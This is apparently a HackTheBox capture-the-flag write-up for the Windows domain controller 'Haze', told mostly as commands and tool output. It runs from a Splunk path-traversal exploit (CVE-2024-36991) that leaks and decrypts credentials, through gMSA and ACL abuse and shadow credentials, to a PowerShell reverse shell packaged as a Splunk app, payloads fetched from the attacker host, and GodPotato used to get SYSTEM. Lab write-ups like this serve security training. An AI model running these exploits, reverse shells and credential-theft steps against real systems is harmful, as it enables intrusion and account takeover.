WriteupsHTB — Haze
ADMediumWindows
HTB — Haze
Splunk misconfiguration leaks credentials. Active Directory enumeration reveals a privilege escalation path through ACL abuse to Domain Admin.
January 10, 2026HackTheBox
#Splunk#AD#ACL Abuse#Credential Leak
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.61
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-31 17:27 EDT
Nmap scan report for 10.10.11.61
Host is up (0.023s latency).
Not shown: 64822 closed tcp ports (reset), 683 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-01 05:27:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
8088/tcp open ssl/http Splunkd httpd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: 404 Not Found
8089/tcp open ssl/http Splunkd httpd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: splunkd
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
51367/tcp open msrpc Microsoft Windows RPC
60078/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
60079/tcp open msrpc Microsoft Windows RPC
60090/tcp open msrpc Microsoft Windows RPC
60095/tcp open msrpc Microsoft Windows RPC
60098/tcp open msrpc Microsoft Windows RPC
60111/tcp open msrpc Microsoft Windows RPC
60125/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=3/31%OT=53%CT=1%CU=31522%PV=Y%DS=2%DC=T%G=Y%TM=67EB
OS:0919%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%
OS:TS=A)SEQ(SP=104%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)OPS(O1=M53CNW8ST1
OS:1%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST
OS:11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80
OS:%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-01T05:28:55
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 8h00m03s
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 23.19 ms 10.10.14.1
2 23.35 ms 10.10.11.61
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.63 seconds
445/tcp open microsoft-ds?
sh
8000/tcp open http
sh
8000/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
sh
Full Haze machine write-up. Enjoy!
user flag
Initial enum
nmap <host>
nuclei --target http://<host>:8000 --tags splunk
Splunk CVE-2024-36991 exploit
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf
splunksecrets splunk-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
Poop rid & Spray piss
crackmapexec smb <host> -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
crackmapexec smb <host> -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
ldapdomaindump -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -o ldapdump <host>
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i <host>
whoami /all
gMSA_Managers group exploit
Set-ADServiceAccount -Identity 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'
exit
netexec ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
Pour the blood & drink it
bloodhound-python -u 'Haze-IT-Backup$' --hashes ':735c02c6...' -d haze.htb -c all -dc dc01.haze.htb -ns <host> --dns-tcp --zip
Support_Services group exploit
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6...' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6...' -f rc4 add genericAll 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6...' -f rc4 add groupMember 'Support_Services' 'Haze-IT-Backup$'
pywhisker --dc-ip <host> -d 'haze.htb' -u 'Haze-IT-Backup$' -H ':735c02c6...' --target 'edward.martin' --action 'add' --filename edward
python3 gettgtpkinit.py haze.htb/edward.martin -cert-pfx edward.pfx -pfx-pass <pass> edward.ccache
export KRB5CCNAME=edward.ccache
python3 getnthash.py haze.htb/edward.martin -key <key>
evil-winrm -u 'edward.martin' -H '09e0b3ee...' -i <host>
gc C:\Users\edward.martin\Desktop\user.txt
root flag
download C:\Backups\Splunk\splunk_backup_2024-08-06.zip
exit
unzip, grep passwords & decrypt
unzip splunk_backup_2024-08-06.zip
grep -rnE '\$[0-9]\$' Splunk
splunksecrets splunk-legacy-decrypt -S Splunk/etc/auth/splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='
splunk creds admin:Sp1unkadmin@2k24
https://github.com/0xjpuff/reverse_shell_splunk
spawn meterpreter shell and exploit SeImpersonatePrivilege
getsystem
getuid
cat /Users/Administrator/Desktop/root.txt
# Welcome!
Bonus
evil-winrm -u 'Administrator' -H '06dc954d...' -i <host>nuclei
sh
nuclei --target http://10.10.11.61:8000 --tags splunk
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.7
projectdiscovery.io
[INF] Your current nuclei-templates v9.6.4 are outdated. Latest is v10.1.6
[INF] Successfully updated nuclei-templates (v10.1.6) to /root/.local/nuclei-templates. GoodLuck!
[INF] Current nuclei version: v3.2.7 (outdated)
[INF] Current nuclei-templates version: v10.1.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 78
[INF] Templates loaded for current scan: 7
[INF] Executing 7 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[splunk-enterprise-panel] [http] [info] http://10.10.11.61:8000/en-US/account/login
[CVE-2024-36991] [http] [high] http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini
[INF] Using Interactsh Server: oast.pro
CVE-2024-36991
LFI
sh
curl http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD sh
curl http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAPsplunksecrets
sh
pip3 install splunksecretscreds
sh
splunksecrets splunk-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
Ld@p_Auth_Sp1unk@2k24nxc
sh
nxc smb 10.10.11.61 -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 sh
nxc smb 10.10.11.61 -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 500: HAZE\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 501: HAZE\Guest (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 512: HAZE\Domain Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 513: HAZE\Domain Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 514: HAZE\Domain Guests (SidTypeGroup)
SMB 10.10.11.61 445 DC01 515: HAZE\Domain Computers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 516: HAZE\Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 517: HAZE\Cert Publishers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 518: HAZE\Schema Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 519: HAZE\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.61 445 DC01 521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 525: HAZE\Protected Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 526: HAZE\Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1000: HAZE\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1101: HAZE\DnsAdmins (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1103: HAZE\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1112: HAZE\Support_Services (SidTypeGroup)winrm
sh
nxc winrm 10.10.11.61 -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
WINRM 10.10.11.61 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM 10.10.11.61 5985 DC01 [-] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
WINRM 10.10.11.61 5985 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)sh
evil-winrm -i 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24'whoami
sh
*Evil-WinRM* PS C:\users\mark.adams> whoami /all
USER INFORMATION
----------------
User Name SID
=============== ===========================================
haze\mark.adams S-1-5-21-323145914-28650650-2368316563-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ =========================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HAZE\gMSA_Managers Group S-1-5-21-323145914-28650650-2368316563-1107 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.sharphound
sh
*Evil-WinRM* PS C:\Users\mark.adams\Documents> upload /opt/windows/SharpHound.exesh
*Evil-WinRM* PS C:\Users\mark.adams\Documents> .\SharpHound.exe -c All --zipfilename haze.htbsh
*Evil-WinRM* PS C:\Users\mark.adams\Documents> download 20250408025210_haze.htb.zipsh
mv 20250408025210_haze.htb.zip /home/sake/htb-labs/Hazesh
Set-ADServiceAccount -Identity 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'
exitsh
nxc ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.61 636 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS 10.10.11.61 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.10.11.61 636 DC01 Account: Haze-IT-Backup$ NTLM: a70df659...Support_Services group exploit
sh
bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df659...' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df659...' -f rc4 add genericAll 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df659...' -f rc4 add groupMember 'Support_Services' 'Haze-IT-Backup$'sh
pywhisker --dc-ip 10.10.11.61 -d 'haze.htb' -u 'Haze-IT-Backup$' -H ':a70df659...' --target 'edward.martin' --action 'add' --filename edward
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 44451007-deac-2bf6-9827-42819b09c9de
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: edward.pfx
[*] Must be used with password: pi1Pc4lBbBe8Ai3qRn25
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtoolssh
ntpdate 10.10.11.61 & python3 /opt/PKINITtools/gettgtpkinit.py haze.htb/edward.martin -cert-pfx edward.pfx -pfx-pass pi1Pc4lBbBe8Ai3qRn25 edward.ccachesh
export KRB5CCNAME=/home/sake/htb-labs/Haze/edward.ccachesh
ntpdate 10.10.11.61 & python3 /opt/PKINITtools/getnthash.py haze.htb/edward.martin -key aa3d4bd3f5a1d4bee9dee94c1f467815d5ad0df8a6eb948749998f4223b870c6
[1] 127124
2025-04-08 07:34:58.546381 (-0400) +28801.954434 +/- 0.012097 10.10.11.61 s1 no-leap
CLOCK: time stepped by 28801.954434
[1] + done ntpdate 10.10.11.61
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
09e0b3ee...sh
evil-winrm -u 'edward.martin' -H '09e0b3ee...' -i 10.10.11.61sh
*Evil-WinRM* PS C:\Users\edward.martin\Desktop> cat user.txt
e8795602...sh
download C:\Backups\Splunk\splunk_backup_2024-08-06.zip
exit
unzip, grep passwords & decrypt
unzip splunk_backup_2024-08-06.zip
grep -rnE '\$[0-9]\$' Splunk
splunksecrets splunk-legacy-decrypt -S Splunk/etc/auth/splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='
splunk creds admin:Sp1unkadmin@2k24
https://github.com/0xjpuff/reverse_shell_splunk
spawn meterpreter shell and exploit SeImpersonatePrivilege
getsystem
getuid
cat /Users/Administrator/Desktop/root.txt
# Welcome!sh
*Evil-WinRM* PS C:\Backups\Splunk> ls
Directory: C:\Backups\Splunk
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/6/2024 3:22 PM 27445566 splunk_backup_2024-08-06.zip
sh
*Evil-WinRM* PS C:\Backups\Splunk> download splunk_backup_2024-08-06.zipsh
grep -rn ./ -ie '$1$YDz8WfhoCWmf6aTRkA+QqUI='
./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf:15:bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=sh
splunksecrets splunk-legacy-decrypt -S ./splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='
Sp1unkadmin@2k24splunk rev shell
run.ps1
sh
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.4 LPORT=443 -f psh-reflection -o run.ps1run.bat
sh
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File run.ps1sh
┌──(root㉿kali)-[/home/…/htb-labs/Haze/reverse_shell_splunk/reverse_shell_splunk]
└─# tree
.
├── bin
│ ├── run.bat
│ └── run.ps1
└── default
└── inputs.conf
3 directories, 3 filesrun.ps1
powershell
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.4',445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()sh
tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
mv reverse_shell_splunk.tgz reverse_shell_splunk.spl- upload and will give the reverse shell
sh
rlwrap nc -lvnp 445
listening on [any] 445 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.61] 55439
whoami
haze\alexander.greenwhoami
sh
PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledSeImpersonatePrivilege
sh
PS C:\> systeminfo
Host Name: DC01
OS Name: Microsoft Windows Server 2022 Standard
OS Version: 10.0.20348 N/A Build 20348
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00454-20165-01481-AA286
Original Install Date: 3/4/2025, 11:00:20 PM
System Boot Time: 4/8/2025, 11:48:02 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: VMware, Inc. VMW71.00V.24224532.B64.2408191458, 8/19/2024
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,423 MB
Virtual Memory: Max Size: 5,503 MB
Virtual Memory: Available: 3,593 MB
Virtual Memory: In Use: 1,910 MB
Page File Location(s): C:\pagefile.sys
Domain: haze.htb
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.61
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.sh
Invoke-WebRequest http://10.10.14.4/nc64.exe -OutFile nc64.exe
Invoke-WebRequest http://10.10.14.4/GodPotato-NET4.exe -OutFile GodPotato-NET4.exesh
.\GodPotato-NET4.exe -cmd "nc64.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.4 445"sh
C:\Users\Administrator\Desktop>type root.txt
type root.txt
841980b2...Up next
MediumJan 2026
Wiz Bug Bounty
Bug bounty masterclass covering exposed databases, SSRF, subdomain takeover, blind XSS, GitHub secret leaks, Spring Boot heapdump, and session confusion ATO.
Read writeup
MediumMar 2026
HTB — Facts
Cacti LFI via CVE-2024-46987 reads configuration files and credentials. Sudo abuse on a custom binary escalates to root.
Read writeup